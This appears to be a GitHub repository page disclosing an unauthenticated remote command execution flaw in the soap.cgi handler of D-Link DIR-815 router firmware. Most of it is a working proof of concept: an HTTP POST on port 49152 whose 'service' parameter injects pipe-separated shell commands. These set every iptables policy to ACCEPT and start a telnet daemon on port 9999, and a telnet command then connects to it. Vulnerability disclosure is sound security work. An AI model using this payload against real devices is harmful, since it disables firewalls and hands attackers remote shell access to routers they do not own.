Skip to content

WhereisRain/dir-815

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

dir-815

Exploit Author: yangchunyu@whu.edu.cn

Vendor: D-Link

Firmware: dir815_v1.01SSb08.bin

I found unauthenticated remote code execution vulnerability in soapcgi_main function of cgibin binary.

On the /soap.cgi HTTP POST message on 49152 port, with the service GET parameter, the unauthenticated remote attacker can execute the shell command.

The similar vulnerability already exists with CVE-2018-6530&CVE-2018-20114.

image

With | string, the device can be exploited, too.

poc

nc 192.168.0.1 49152
POST /soap.cgi?service=|iptables -P INPUT ACCEPT|iptables -P FORWARD ACCEPT|iptables -P OUTPUT ACCEPT|iptables -t nat -P PREROUTING ACCEPT|iptables -t nat -P OUTPUT ACCEPT|iptables -t nat -P POSTROUTING ACCEPT|telnetd -p 9999| HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

whatever content...

telnet 192.168.0.1 9999

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published